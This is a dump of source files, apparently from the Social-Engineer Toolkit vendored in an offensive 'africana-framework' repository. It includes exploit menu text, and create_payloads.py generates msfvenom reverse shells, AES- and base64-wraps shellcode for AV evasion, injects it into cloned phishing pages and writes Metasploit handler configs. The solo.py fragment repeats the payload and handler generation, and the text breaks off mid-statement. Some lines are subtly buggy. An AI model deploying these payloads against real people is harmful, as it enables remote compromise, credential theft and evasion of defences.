'MS11-050 IE mshtml!CObjectElement Use After Free (2011-06-16)',
'Adobe Flash Player 10.2.153.1 SWF Memory Corruption Vulnerability (2011-04-11)',
'Cisco AnyConnect VPN Client ActiveX URL Property Download and Execute (2011-06-01)',
'Internet Explorer CSS Import Use After Free (2010-11-29)',
'Microsoft WMI Administration Tools ActiveX Buffer Overflow (2010-12-21)',
'Internet Explorer CSS Tags Memory Corruption (2010-11-03)',
'Sun Java Applet2ClassLoader Remote Code Execution (2011-02-15)',
'Sun Java Runtime New Plugin docbase Buffer Overflow (2010-10-12)',
'Microsoft Windows WebDAV Application DLL Hijacker (2010-08-18)',
'Adobe Flash Player AVM Bytecode Verification Vulnerability (2011-03-15)',
'Adobe Shockwave rcsL Memory Corruption Exploit (2010-10-21)',
'Adobe CoolType SING Table "uniqueName" Stack Buffer Overflow (2010-09-07)',
'Apple QuickTime 7.6.7 Marshaled_pUnk Code Execution (2010-08-30)',
'Microsoft Help Center XSS and Command Execution (2010-06-09)',
'Microsoft Internet Explorer iepeers.dll Use After Free (2010-03-09)',
'Microsoft Internet Explorer "Aurora" Memory Corruption (2010-01-14)',
'Microsoft Internet Explorer Tabular Data Control Exploit (2010-03-0)',
'Microsoft Internet Explorer 7 Uninitialized Memory Corruption (2009-02-10)',
'Microsoft Internet Explorer Style getElementsbyTagName Corruption (2009-11-20)',
'Microsoft Internet Explorer isComponentInstalled Overflow (2006-02-24)',
'Microsoft Internet Explorer Explorer Data Binding Corruption (2008-12-07)',
'Microsoft Internet Explorer Unsafe Scripting Misconfiguration (2010-09-20)',
'FireFox 3.5 escape Return Value Memory Corruption (2009-07-13)',
'FireFox 3.6.16 mChannel use after free vulnerability (2011-05-10)',
'Metasploit Browser Autopwn (USE AT OWN RISK!)\n']
browser_exploits_text = """
Enter the browser exploit you would like to use [8]:
"""
# this is for the powershell attack vectors
powershell_menu = ['Powershell Alphanumeric Shellcode Injector',
'Powershell Reverse Shell',
'Powershell Bind Shell',
'Powershell Dump SAM Database',
'0D']
powershell_text = ("""
The """ + bcolors.BOLD + """Powershell Attack Vector""" + bcolors.ENDC + """ module allows you to create PowerShell specific attacks. These attacks will allow you to use PowerShell which is available by default in all operating systems Windows Vista and above. PowerShell provides a fruitful landscape for deploying payloads and performing functions that do not get triggered by preventative technologies.\n""")
encoder_menu = ['shikata_ga_nai',
'No Encoding',
'Multi-Encoder',
'Backdoored Executable\n']
encoder_text = """
Select one of the below, 'backdoored executable' is typically the best. However,
most still get picked up by AV. You may need to do additional packing/crypting
in order to get around basic AV detection.
"""
dll_hijacker_text = """
The DLL Hijacker vulnerability will allow normal file extenstions to
call local (or remote) .dll files that can then call your payload or
executable. In this scenario it will compact the attack in a zip file
and when the user opens the file extension, will trigger the dll then
ultimately our payload. During the time of this release, all of these
file extensions were tested and appear to work and are not patched. This
will continiously be updated as time goes on.
"""
fakeap_dhcp_menu = ['10.0.0.100-254',
'192.168.10.100-254\n']
fakeap_dhcp_text = "Please choose which DHCP Config you would like to use: "
| 20,888 | Python | .py | 323 | 58.182663 | 413 | 0.704152 | CHEGEBB/africana-framework | 8 | 1 | 0 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,285,845 | create_payloads.py | CHEGEBB_africana-framework/externals/set/src/core/payloadgen/create_payloads.py | #!/usr/bin/env python3
# Import modules
import subprocess
import time
import sys
import os
import re
import socket
import base64
from src.core.setcore import *
from src.core.menu.text import *
from src.core.dictionaries import *
try:
if len(check_options("IPADDR=")) > 2:
ipaddr = check_options("IPADDR=")
else:
ipaddr = ""
except:
ipaddr = ""
me = mod_name()
listener = "notdefined"
definepath = os.getcwd()
sys.path.append(definepath)
port1 = "8080"
port2 = "8081"
operating_system = check_os()
# check stage encoding - shikata ga nai for payload delivery
stage_encoding = check_config("STAGE_ENCODING=").lower()
if stage_encoding == "off":
stage_encoding = "false"
else:
stage_encoding = "true"
configfile = open("/etc/setoolkit/set.config", "r").readlines()
# check the metasploit path
msf_path = meta_path()
# check the config files for all of the flags needed for the file
auto_migrate = check_config("AUTO_MIGRATE=")
meterpreter_multi = check_config("METERPRETER_MULTI_SCRIPT=")
linux_meterpreter_multi = check_config("LINUX_METERPRETER_MULTI_SCRIPT=")
meterpreter_multi_command = check_config("METERPRETER_MULTI_COMMANDS=")
meterpreter_multi_command = meterpreter_multi_command.replace(";", "\n")
linux_meterpreter_multi_command = check_config("LINUX_METERPRETER_MULTI_COMMANDS=")
linux_meterpreter_multi_command = linux_meterpreter_multi_command.replace(";", "\n")
unc_embed = check_config("UNC_EMBED=")
attack_vector = 0
linosx = 0
multiattack = ""
# grab attack vector
if os.path.isfile(userconfigpath + "attack_vector"):
fileopen = open(userconfigpath + "attack_vector", "r")
for line in fileopen:
line = line.rstrip()
if line == "java":
attack_vector = "java"
if line == "multiattack":
attack_vector = "multiattack"
multiattack = open(userconfigpath + "multi_payload", "w")
# here is a place holder for the multi attack java
# multiattack outputs a file called multi_java if
# this file is present it will allow additional
# functionality
multiattack_java = "off"
if os.path.isfile(userconfigpath + "multi_java"):
multiattack_java = "on"
# custom payloadgen
payloadgen = "regular"
if os.path.isfile(userconfigpath + "payloadgen"):
payloadgen = "solo"
#
# grab ipaddr if it hasn't been identified yet
#
if check_options("IPADDR=") == False:
fileopen = open("/etc/setoolkit/set.config", "r")
data = fileopen.read()
match = re.search("AUTO_DETECT=ON", data)
if match:
try:
ipaddr = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
ipaddr.connect(('google.com', 0))
ipaddr.settimeout(2)
ipaddr = ipaddr.getsockname()[0]
update_options("IPADDR=" + ipaddr)
except Exception as e:
log(e)
ipaddr = raw_input(
setprompt(["4"], "IP address for the payload listener (LHOST)"))
update_options("IPADDR=" + ipaddr)
# if AUTO_DETECT=OFF prompt for IP Address
match = re.search("AUTO_DETECT=OFF", data)
if match:
ipaddr = raw_input(
setprompt(["4"], "Enter the IP address for the payload (reverse)"))
update_options("IPADDR=" + ipaddr)
# payload selection here
try:
# Specify path to metasploit
path = msf_path
# Specify payload
# this is encoding
encode = ""
# this is payload
choice1 = ""
# this is port
choice3 = ""
if os.path.isfile(userconfigpath + "meterpreter_reverse_tcp_exe"):
fileopen = open(userconfigpath + "meterpreter_reverse_tcp_exe", "r")
for line in fileopen:
# this reads in the first line of the file which happens to be port
# when calling through core
choice3 = line.rstrip()
# change attack_vector to nothing
attack_vector = ""
# specify payload
choice1 = "windows/meterpreter/reverse_tcp"
# encode using backdoored executable
encode = "16"
# if we don't trigger on the standard core api call
if choice1 == "":
#
# USER INPUT: SHOW PAYLOAD MENU 1 #
#
debug_msg(me, "printing 'text.payload_menu_1'", 5)
show_payload_menu1 = create_menu(payload_menu_1_text, payload_menu_1)
choice1 = raw_input(setprompt(["4"], ""))
# default blank then select pyinjector
if choice1 == "":
choice1 = "1"
# check the length and make sure it works
if choice1 != "":
choice1 = check_length(choice1, 8)
# convert it to a string
choice1 = str(choice1)
custom = 0
counter = 0
flag = 0
encode_stop = 0
# Condition testing of 'choice1'
# Will use a dictionary list
if choice1 == "exit":
exit_set()
if choice1 == '':
choice1 = ("1")
if choice1 == '5' or choice1 == '6' or choice1 == '7':
encode_stop = 1
encode = ""
if choice1 == '7':
flag = 1
# here we specify shellcodeexec
if choice1 == '1' or choice1 == '2' or choice1 == '6' or choice1 == '8':
encode_stop = 1
encode = 0
# 11 is the set interactive shell, 12 is set rev http shell and 13 is
# ratte listener
if choice1 == '3' or choice1 == '4' or choice1 == "5":
encoder = 'false'
payloadgen = 'solo'
encode_stop = 1
filewrite = open(userconfigpath + "set.payload", "w")
# select setshell
if choice1 == '3':
filewrite.write("SETSHELL")
# select setshell_reverse
if choice1 == '4':
filewrite.write("SETSHELL_HTTP")
# select ratte
if choice1 == '5':
filewrite.write("RATTE")
filewrite.close()
if choice1 != "7":
# if not then import the payload selection
choice1 = ms_payload_2(choice1)
# don't do courtesy shell
if counter == 0:
courtesyshell = ("")
# if custom
if choice1 == '7':
print_info("Example: /root/custom.exe")
choice1 = raw_input(setprompt(["4"], "Enter the path to your executable"))
if not os.path.isfile(choice1):
while 1:
print_error("ERROR:File not found. Try Again.")
choice1 = raw_input(setprompt(["4"], "Enter the path to your executable"))
if os.path.isfile(choice1): break
update_options("CUSTOM_EXE=%s" % (choice1))
custom = 1
# if we are using our own executable
if custom == 1:
check_write = open(userconfigpath + "custom.exe", "w")
check_write.write("VALID")
check_write.close()
shutil.copyfile("%s" % (choice1), "msf.exe")
shutil.copyfile("msf.exe", userconfigpath + "msf.exe")
# Specify Encoding Option
encoder = "false"
if choice1 == "cmd/multi": update_options("CUSTOM_EXE=CMD/MULTI")
# if we aren't using the set shell
if choice1 != "set/reverse_shell":
# we need to rewrite index.html real quick because it has a parameter
# that could get confusing
if os.path.isfile(userconfigpath + "web_clone/index.html"):
fileopen = open(userconfigpath + "web_clone/index.html", "r")
data = fileopen.read()
data = data.replace("freehugs", "")
os.remove(userconfigpath + "web_clone/index.html")
filewrite = open(userconfigpath + "web_clone/index.html", "w")
filewrite.write(data)
filewrite.close()
# Specify Remote Host if ipaddr.file is missing (should never get here)
if check_options("IPADDR=") == 0:
choice2 = raw_input(setprompt(
["4"], "IP Address of the listener/attacker (reverse) or host/victim (bind shell)"))
update_options("IPADDR=" + choice2)
choice2 = check_options("IPADDR=")
# specify the port for the listener
if choice3 == "":
if choice1 != "shellcode/multipyinject":
if choice1 != "cmd/multi":
if custom == 0:
choice3 = raw_input(setprompt(["4"], "PORT of the listener [443]"))
# here we check if the user really wants to use port 80
if choice3 == "80":
print_warning(
"WARNING: SET Web Server requires port 80 to listen.")
print_warning(
"WARNING: Are you sure you want to proceed with port 80?")
port_choice_option = raw_input(
"\nDo you want to keep port 80? [y/n]")
if port_choice_option == "n":
# reprompt it
choice3 = raw_input(setprompt(["4"], "PORT of listener [443]"))
if choice3 == '':
choice3 = '443'
# this is needed for the set_payload
update_options("PORT=" + choice3)
# if we are using the SET interactive shell then do this
if choice1 == "set/reverse_shell":
encoder = "false"
filewrite = open(userconfigpath + "set.payload.posix", "w")
filewrite.write("true")
filewrite.close()
import src.core.payloadprep
# if were using the multiattack option
if attack_vector == "multiattack":
multiattack.write("MAIN=" + str(choice3) + "\n")
multiattack.write("MAINPAYLOAD=" + str(choice1) + "\n")
# if encoding is required, it will place 1msf.exe first then encode it
# to msf.exe
if encoder == "true":
choice4 = ("raw")
msf_filename = ("1msf.exe")
if encoder == "false":
choice4 = ("exe")
msf_filename = ("msf.exe")
# set choice to blank for ALL PORTS scan
if flag == 0:
portnum = "LPORT=" + choice3
if flag == 1:
portnum = ""
if encode != "BACKDOOR":
# if we aren't using the set reverse shell
if choice1 != "set/reverse_shell":
# if we are using shellcodeexec
if choice1 == "shellcode/alphanum" or choice1 == "shellcode/pyinject" or choice1 == "shellcode/multipyinject":
if choice1 == "shellcode/alphanum" or choice1 == "shellcode/pyinject":
print ("\nSelect the payload you want to deliver via shellcode injection\n\n 1) Windows Meterpreter Reverse TCP\n 2) Windows Meterpreter (Reflective Injection), Reverse HTTPS Stager\n 3) Windows Meterpreter (Reflective Injection) Reverse HTTP Stager\n 4) Windows Meterpreter (ALL PORTS) Reverse TCP\n")
# select payload
choice9 = raw_input(setprompt(["4"], "Enter the number for the payload [meterpreter_reverse_https]"))
# select default meterpreter reverse tcp
if choice9 == "":
choice9 = "windows/meterpreter/reverse_https"
if choice9 == "1":
choice9 = "windows/meterpreter/reverse_tcp"
# select reverse https
if choice9 == "2":
choice9 = "windows/meterpreter/reverse_https"
# select reverse http
if choice9 == "3":
choice9 = "windows/meterpreter/reverse_http"
# select all ports
if choice9 == "4":
choice9 = "windows/meterpreter/reverse_tcp_allports"
if ipaddr == "":
# grab ipaddr if not defined
ipaddr = check_options("IPADDR=")
if choice1 == "shellcode/alphanum":
print_status("Generating the payload via msfvenom and generating alphanumeric shellcode...")
subprocess.Popen("%smsfvenom -p %s LHOST=%s %s StagerURILength=5 StagerVerifySSLCert=false -e EXITFUNC=thread -e x86/alpha_mixed --format raw BufferRegister=EAX > %s/meterpreter.alpha_decoded" % (meta_path(), choice9, choice2, portnum, userconfigpath), shell=True).wait()
if choice1 == "shellcode/pyinject" or choice1 == "shellcode/multipyinject" or choice1 == "cmd/multi":
# here we update set options to specify pyinjection and multipy
update_options("PYINJECTION=ON")
# define, this will eventually be all of our payloads
multipyinject_payload = ""
# clean up old file
if os.path.isfile("%s/meta_config_multipyinjector" % (userconfigpath)):
os.remove("%s/meta_config_multipyinjector" % (userconfigpath))
# remove any old payload options
if os.path.isfile(userconfigpath + "payload.options.shellcode"):
os.remove(userconfigpath + "payload_options.shellcode")
# this is the file that gets saved with the payload and
# port options
if choice1 != "cmd/multi": payload_options = open(userconfigpath + "payload_options.shellcode", "a")
while 1:
# don't need any options here
if choice1 == "cmd/multi": break
if choice1 == "shellcode/multipyinject":
print ("\nSelect the payload you want to deliver via shellcode injection\n\n 1) Windows Meterpreter Reverse TCP\n 2) Windows Meterpreter (Reflective Injection), Reverse HTTPS Stager\n 3) Windows Meterpreter (Reflective Injection) Reverse HTTP Stager\n 4) Windows Meterpreter (ALL PORTS) Reverse TCP\n 5) Windows Reverse Command Shell\n 6) I'm finished adding payloads.\n")
choice9 = raw_input(
setprompt(["4"], "Enter the number for the payload [meterpreter_reverse_tcp]"))
# select default meterpreter reverse tcp
if choice9 == "" or choice9 == "1":
choice9 = "windows/meterpreter/reverse_tcp"
# select reverse https
if choice9 == "2":
choice9 = "windows/meterpreter/reverse_https"
# select reverse http
if choice9 == "3":
choice9 = "windows/meterpreter/reverse_http"
# select all ports
if choice9 == "4":
choice9 = "windows/meterpreter/reverse_tcp_allports"
if choice9 == "5":
choice9 = "windows/shell/reverse_tcp"
# check the ipaddr
if ipaddr == "":
# grab ipaddr if not defined
ipaddr = check_options("IPADDR=")
# break out if not needed
if choice9 == "6":
break
shellcode_port = raw_input(setprompt(["4"], "Enter the port number [443]"))
if shellcode_port == "": shellcode_port = "443"
# here we prep our meta config to listen on all
# the ports we want - free hugs all around
filewrite = open("%s/meta_config_multipyinjector" % (userconfigpath), "a")
port_check = check_ports("%s/meta_config_multipyinjector" % (userconfigpath), shellcode_port)
if port_check == False:
filewrite.write("use exploit/multi/handler\nset PAYLOAD %s\nset EnableStageEncoding %s\nset LHOST %s\nset LPORT %s\nset ExitOnSession false\nexploit -j\r\n\r\n" % (choice9, stage_encoding, ipaddr, shellcode_port))
filewrite.close()
if choice1 != "cmd/multi":
if validate_ip(choice2) == False:
if choice9 != "windows/meterpreter/reverse_https":
if choice9 != "windows/meterpreter/reverse_http":
print_status("Possible hostname detected, switching to windows/meterpreter/reverse_https")
choice9 == "windows/meterpreter/reverse_https"
if choice9 == "windows/meterpreter/reverse_tcp_allports":
portnum = "LPORT=1"
# fix port num
if "multipyinject" in choice1:
portnum = shellcode_port
else:
portnum = portnum.replace("LPORT=", "")
# meterpreter reverse_tcp
if choice9 == "windows/meterpreter/reverse_tcp":
shellcode = metasploit_shellcode(choice9, choice2, portnum)
# meterpreter reverse_https
if choice9 == "windows/meterpreter/reverse_https":
shellcode = metasploit_shellcode(choice9, choice2, portnum)
# meterpreter reverse_http
if choice9 == "windows/meterpreter/reverse_http":
shellcode = metasploit_shellcode(choice9, choice2, portnum)
# meterpreter tcp allports
if choice9 == "windows/meterpreter/reverse_tcp_allports":
shellcode = metasploit_shellcode(choice9, choice2, portnum)
# windows shell reverse_tcp
if choice9 == "windows/shell/reverse_tcp":
shellcode = metasploit_shellcode(choice9, choice2, portnum)
if choice1 == "shellcode/pyinject":
shellcode_port = portnum.replace("LPORT=", "")
if validate_ip(choice2) == True:
shellcode = shellcode_replace(choice2, shellcode_port, shellcode)
# here we write out the payload and port for later
# use in powershell injection
payload_options.write(choice9 + " " + portnum + ",")
# break out of the loop if we are only using one
# payload else keep on
if choice1 == "shellcode/pyinject": break
multipyinject_payload += shellcode + ","
if choice1 != "cmd/multi":
# get rid of tail comma
if multipyinject_payload.endswith(","):
multipyinject_payload = multipyinject_payload[:-1]
# if we have multiple payloads, use multi injector
if choice1 == "shellcode/multipyinject":
# we first need to encrypt the payload via AES 256
print_status("Encrypting the shellcode via AES 256 encryption..")
secret = os.urandom(32)
shellcode = encryptAES(secret, multipyinject_payload)
print_status("Dynamic cipher key created and embedded into payload.")
filewrite = open("%s/meterpreter.alpha_decoded" % (userconfigpath), "w")
filewrite.write(shellcode)
filewrite.close()
if choice1 == "shellcode/pyinject" or choice1 == "shellcode/multipyinject":
# close the pyinjector file for ports and payload
payload_options.close()
# here we are going to encode the payload via base64
fileopen = open("%s/meterpreter.alpha_decoded" % (userconfigpath), "r")
data = fileopen.read()
if payloadgen != "solo":
# base64 1
data = str(data)
data = base64.b64encode(b'data')
# encode it again for the fun 2
data = base64.b64encode(b'data')
# again 3
data = base64.b64encode(b'data')
# again 4
data = base64.b64encode(b'data')
# again 5
data = base64.b64encode(b'data')
# again 6
data = base64.b64encode(b'data')
# again 7
data = base64.b64encode(b'data')
# again 8
data = base64.b64encode(b'data')
# 9
data = base64.b64encode(b'data')
# 10
data = base64.b64encode(b'data')
# last one
data = base64.b64encode(b'data')
#
filewrite = open("%s/meterpreter.alpha" % (userconfigpath), "w")
filewrite.write(str(data))
filewrite.close()
if choice1 == "shellcode/alphanum":
print_status("Prepping shellcodeexec for delivery..")
if choice1 == "shellcode/pyinject":
print_status("Prepping pyInjector for delivery..")
# prepping multi pyinjector
if choice1 == "shellcode/multipyinject":
print_status("Prepping Multi-pyInjector for delivery..")
# here we obfuscate the binary a little bit
random_string = generate_random_string(3, 3).upper()
if choice1 == "shellcode/alphanum":
fileopen = open("%s/src/payloads/exe/shellcodeexec.binary" % (definepath), "rb").read()
if choice1 == "shellcode/pyinject":
fileopen = open("%s/src/payloads/set_payloads/pyinjector.binary" % (definepath), "rb").read()
if choice1 == "shellcode/multipyinject":
fileopen = open("%s/src/payloads/set_payloads/multi_pyinjector.binary" % (definepath), "rb").read()
# write out the payload
if choice1 == "shellcode/alphanum" or choice1 == "shellcode/pyinject" or choice1 == "shellcode/multipyiject":
filewrite = open(userconfigpath + "msf.exe", "wb")
filewrite.write(fileopen)
filewrite.close()
subprocess.Popen("cp %s/shellcodeexec.custom %s/msf.exe 1> /dev/null 2> /dev/null" % (userconfigpath, userconfigpath), shell=True).wait()
# we need to read in the old index.html file because its
# already generated, need to present the alphanum to it
if os.path.isfile("%s/web_clone/index.html" % (userconfigpath)):
fileopen = open("%s/web_clone/index.html" %(userconfigpath), "r")
filewrite = open("%s/web_clone/index.html.new" % (userconfigpath), "w")
fileopen2 = open("%s/meterpreter.alpha" % (userconfigpath), "r")
alpha_shellcode = fileopen2.read().rstrip()
data = fileopen.read()
data = data.replace(
'param name="2" value=""', 'param name="2" value="%s"' % (alpha_shellcode))
if choice1 == "shellcode/multipyinject":
secret = base64.b64encode(b'secret')
data = data.replace('param name="10" value=""', 'param name="10" value ="%s"' % (secret))
filewrite.write(str(data))
# close file
filewrite.close()
# rename file
if choice1 == "shellcode/alphanum":
print_status("Prepping website for alphanumeric injection..")
if choice1 == "shellcode/pyinject":
print_status("Prepping website for pyInjector shellcode injection..")
print_status("Base64 encoding shellcode and prepping for delivery..")
subprocess.Popen("mv %s/web_clone/index.html.new %s/web_clone/index.html 1> /dev/null 2> /dev/null" % (userconfigpath, userconfigpath), shell=True).wait()
if choice9 == "windows/meterpreter/reverse_tcp_allports":
portnum = "LPORT=1"
choice3 = "1"
# UPDATE THE SET CONFIG OPTIONS
update_options("PORT=1")
# here we specify the payload name thats stored later on
choice1 = choice9
# write out the payload for powershell injection to pick it up if used
filewrite = open(userconfigpath + "metasploit.payload", "w")
filewrite.write(choice1)
filewrite.close()
# import if on
setshell_counter = 0
powershell = check_config("POWERSHELL_INJECTION=")
if powershell.lower() == "on" or powershell.lower() == "yes":
if choice1 == "set/reverse_shell" or choice1 == "RATTE":
print_status("Please note that the SETSHELL and RATTE are not compatible with the powershell injection technique. Disabling the powershell attack.")
setshell_counter = 1
if setshell_counter == 0:
if custom == 0: # or choice1 != "set/reverse_shell" or choice1 != "shellcode/alphanum":
if os.path.isfile("%s/web_clone/index.html" % (userconfigpath)):
if choice1 != "cmd/multi":
try: core.module_reload(src.payloads.powershell.prep)
except: import src.payloads.powershell.prep
if os.path.isfile("%s/x86.powershell" % (userconfigpath)):
fileopen1 = open("%s/x86.powershell" % (userconfigpath), "r")
x86 = fileopen1.read()
x86 = "powershell -ec " + x86
# if we specified option cmd/multi which allows us to enter commands in instead and execute them many times
if choice1 == "cmd/multi":
print_status("This section will allow you to specify your own .txt file which can contain one more multiple commands. In order to execute multiple commands you would enter them in for example: cmd1,cmd2,cmd3,cmd4. In the background the Java Applet will enter in cmd /c 'yourcommands here'. You need to provide a path to the txt file that contains all of your commands or payloads split by commas. If just one, then just use no ,.")
filepath = raw_input("\nEnter the path to the file that contains commands: ")
while 1:
if not os.path.isfile(filepath):
filepath = raw_input("[!] File not found.\nEnter the path again and make sure file is there: ")
if os.path.isfile(filepath): break
x86 = open(filepath, "r").read()
print_status("Multi-command payload delivery for Java Applet selected.")
print_status("Embedding commands into Java Applet parameters...")
print_status("Note that these will be base64-encoded once, regardless of the payload..")
fileopen3 = open("%s/web_clone/index.html" % (userconfigpath), "r")
filewrite = open("%s/web_clone/index.html.new" % (userconfigpath), "w")
data = fileopen3.read()
# encode once, will need to decode later
x86 = x86.encode("utf-8")
base_encode = base64.b64encode(x86)
data = data.replace('param name="5" value=""', 'param name="5" value="%s"' % (base_encode))
data = data.replace('param name="6" value=""', 'param name="6" value="%s"' % (base_encode))
if choice1 == "cmd/multi": data = data.replace('param name="8" value="YES"', 'param name="8" value="NO"')
if choice1 != "cmd/multi":
# check if we don't want to deploy binaries
deploy_binaries = check_config("DEPLOY_BINARIES=")
if deploy_binaries.lower() == "n" or deploy_binaries.lower() == "no":
data = data.replace('param name="8" value="YES"', 'param name="8" value="NO"')
if deploy_binaries.lower() == "y" or deploy_binaries.lower() == "yes":
data = data.replace('param name="8" value="NO"', 'param name="8" value="YES"')
filewrite.write(data)
filewrite.close()
subprocess.Popen("mv %s/web_clone/index.html.new %s/web_clone/index.html" % (userconfigpath, userconfigpath), stdout=subprocess.PIPE, shell=True).wait()
# here we specify the binary to deploy if we are using ones that are
# required to drop binaries
if custom == 1 or choice1 == "set/reverse_shell" or choice1 == "shellcode/alphanum" or choice1 == "cmd/multi":
fileopen3 = fileopen = open("%s/web_clone/index.html" % (userconfigpath), "r")
filewrite = open("%s/web_clone/index.html.new" % (userconfigpath), "w")
data = fileopen3.read()
# check if we don't want to deploy binaries
data = data.replace('param name="8" value="NO"', 'param name="8" value="YES"')
filewrite.write(data)
filewrite.close()
subprocess.Popen("mv %s/web_clone/index.html.new %s/web_clone/index.html" % (userconfigpath, userconfigpath), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)
# specify attack vector as SET interactive shell
if choice1 == "set/reverse_shell":
attack_vector = "set_payload"
# if we have the java attack, multiattack java, and the set interactive
# shell
if attack_vector == "java" or multiattack_java == "on":
if attack_vector != "set_payload":
# pull in the ports from config
port1 = check_config("OSX_REVERSE_PORT=")
# if we are using the multiattack, there will be port
# conflicts, need to scoot it to 8082
if attack_vector == "multiattack":
port1 = "8082"
# deploy nix and linux binaries
if check_config("DEPLOY_OSX_LINUX_PAYLOADS=").lower() == "on":
# if we are using a custom linux/osx payload
if check_config("CUSTOM_LINUX_OSX_PAYLOAD=").lower() == "on":
osx_path = raw_input(
"Enter the path for the custom OSX payload (blank for nothing): ")
lin_path = raw_input(
"Enter the path for the custom Linux payload (blank for nothing): ")
print_status(
"Copying custom payloads into proper directory structure.")
# if we didn't specify blank
if osx_path != "":
while 1:
if not os.path.isfile(osx_path):
print_error(
"File not found, enter the path again.")
osx_path = raw_input(
"Enter the path for the custom OSX payload (blank for nothing): ")
if os.path.isfile(osx_path):
break
if osx_path != "":
# copy the payload
shutil.copyfile(osx_path, userconfigpath + "mac.bin")
# if linux payload
if lin_path != "":
while 1:
if not os.path.isfile(lin_path):
print_error(
"File not found, enter the path again.")
lin_path = raw_input(
"Enter the path for the custom Linux payload (blank for nothing): ")
if os.path.isfile(lin_path):
break
if lin_path != "":
# copy the payload
shutil.copyfile(lin_path, userconfigpath + "nix.bin")
else:
port2 = check_config("LINUX_REVERSE_PORT=")
osxpayload = check_config("OSX_PAYLOAD_DELIVERY=")
linuxpayload = check_config("LINUX_PAYLOAD_DELIVERY=")
print_status("Generating OSX payloads through Metasploit...")
subprocess.Popen(r"msfvenom -p %s LHOST=%s LPORT=%s --format elf > %s/mac.bin;chmod 755 %s/mac.bin" % (meta_path(), osxpayload, choice2, port1, userconfigpath, userconfigpath), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
print_status("Generating Linux payloads through Metasploit...")
subprocess.Popen(r"%smsfvenom -p %s LHOST=%s LPORT=%s --format elf > %s/nix.bin" % (meta_path(), linuxpayload, choice2, port2, userconfigpath), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
if multiattack_java == "on":
multiattack.write("OSX=" + str(port1) + "\n")
multiattack.write("OSXPAYLOAD=%s\n" % (osxpayload))
multiattack.write("LINUX=" + str(port2) + "\n")
multiattack.write("LINUXPAYLOAD=%s\n" % (linuxpayload))
osxcheck = check_options("MAC.BIN=")
linuxcheck = check_options("NIX.BIN=")
shutil.copyfile(userconfigpath + "mac.bin", userconfigpath + "web_clone/%s" % (osxcheck))
shutil.copyfile(userconfigpath + "nix.bin", userconfigpath + "web_clone/%s" % (linuxcheck))
# try block here
try:
# if they want a listener, start here
if os.path.isfile("%s/meta_config" % (userconfigpath)):
# if its already created
filewrite = open("%s/meta_config" % (userconfigpath), "a")
if not os.path.isfile("%s/meta_config" % (userconfigpath)):
# if we need to create it
filewrite = open("%s/meta_config" % (userconfigpath), "w")
# if there isn't a multiattack metasploit, setup handler
if not os.path.isfile("%s/multi_meta" % (userconfigpath)):
port_check = check_ports("%s/meta_config" % (userconfigpath), choice3)
if port_check == False:
filewrite.write("use exploit/multi/handler\n")
filewrite.write("set PAYLOAD " + choice1 + "\n")
filewrite.write("set LHOST " + ipaddr + "\n")
if flag == 0:
filewrite.write("set LPORT " + choice3 + "\n")
filewrite.write("set EnableStageEncoding %s\n" %
(stage_encoding))
filewrite.write("set ExitOnSession false\n")
if auto_migrate == "ON":
filewrite.write(
"set AutoRunScript post/windows/manage/smart_migrate\n")
# config option for using multiscript meterpreter
if meterpreter_multi == "ON":
multiwrite = open(userconfigpath + "multi_meter.file", "w")
multiwrite.write(meterpreter_multi_command)
filewrite.write(
"set InitialAutorunScript multiscript -rc %s/multi_meter.file\n" % (userconfigpath))
multiwrite.close()
filewrite.write("exploit -j\r\n\r\n")
# if we want to embed UNC paths for hashes
if unc_embed == "ON":
filewrite.write("use server/capture/smb\n")
filewrite.write("exploit -j\r\n\r\n")
# if only doing payloadgen then close the stuff up
if payloadgen == "solo":
filewrite.close()
# Define linux and OSX payloads
if payloadgen == "regular":
if check_config("DEPLOY_OSX_LINUX_PAYLOADS=").lower() == "on":
filewrite.write("use exploit/multi/handler\n")
filewrite.write(
"set PAYLOAD osx/x86/shell_reverse_tcp" + "\n")
filewrite.write("set LHOST " + choice2 + "\n")
filewrite.write("set LPORT " + port1 + "\n")
filewrite.write("set ExitOnSession false\n")
filewrite.write("exploit -j\r\n\r\n")
filewrite.write("use exploit/multi/handler\n")
filewrite.write(
"set PAYLOAD linux/x86/shell/reverse_tcp" + "\n")
filewrite.write("set LHOST " + choice2 + "\n")
filewrite.write("set LPORT " + port2 + "\n")
if linux_meterpreter_multi == "ON":
multiwrite = open(
userconfigpath + "lin_multi_meter.file", "w")
multiwrite.write(linux_meterpreter_multi_command)
filewrite.write(
"set InitialAutorunScript multiscript -rc %s/lin_multi_meter.file\n" % (userconfigpath))
multiwrite.close()
filewrite.write("set ExitOnSession false\n")
filewrite.write("exploit -j\r\n\r\n")
filewrite.close()
except Exception as e:
log(e)
print_error("ERROR:Something went wrong:")
print(bcolors.RED + "ERROR:" + str(e) + bcolors.ENDC)
# Catch all errors
except KeyboardInterrupt:
print_warning("Keyboard Interrupt Detected, exiting Payload Gen")
# finish closing up the remenant files
if attack_vector == "multiattack":
multiattack.close()
if os.path.isfile("%s/fileformat.file" % (userconfigpath)):
filewrite = open("%s/payload.options" % (userconfigpath), "w")
filewrite.write(choice1 + " " + ipaddr + " " + choice3)
filewrite.close()
if choice1 == "set/reverse_shell":
if os.path.isfile(userconfigpath + "meta_config"):
os.remove(userconfigpath + "meta_config")
| 40,269 | Python | .py | 686 | 40.225948 | 459 | 0.522181 | CHEGEBB/africana-framework | 8 | 1 | 0 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,285,846 | solo.py | CHEGEBB_africana-framework/externals/set/src/core/payloadgen/solo.py | #!/usr/bin/env python3
import subprocess
from src.core.setcore import *
from src.core.menu.text import *
from src.core.dictionaries import *
# definepath
definepath = os.getcwd()
sys.path.append(definepath)
# grab the metasploit path
meta_path = meta_path()
# here we handle our main payload generation
def payload_generate(payload, lhost, port):
# generate metasploit
subprocess.Popen(meta_path + "msfvenom -p %s LHOST=%s LPORT=%s --format=exe > %s/payload.exe" %
(payload, lhost, port, userconfigpath), stderr=subprocess.PIPE, stdout=subprocess.PIPE, shell=True).wait()
# write out the rc file
filewrite = open(userconfigpath + "meta_config", "w")
filewrite.write(
"use multi/handler\nset payload %s\nset LHOST %s\nset LPORT %s\nset ExitOnSession false\nexploit -j\r\n\r\n" % (payload, lhost, port))
filewrite.close()
print_status(
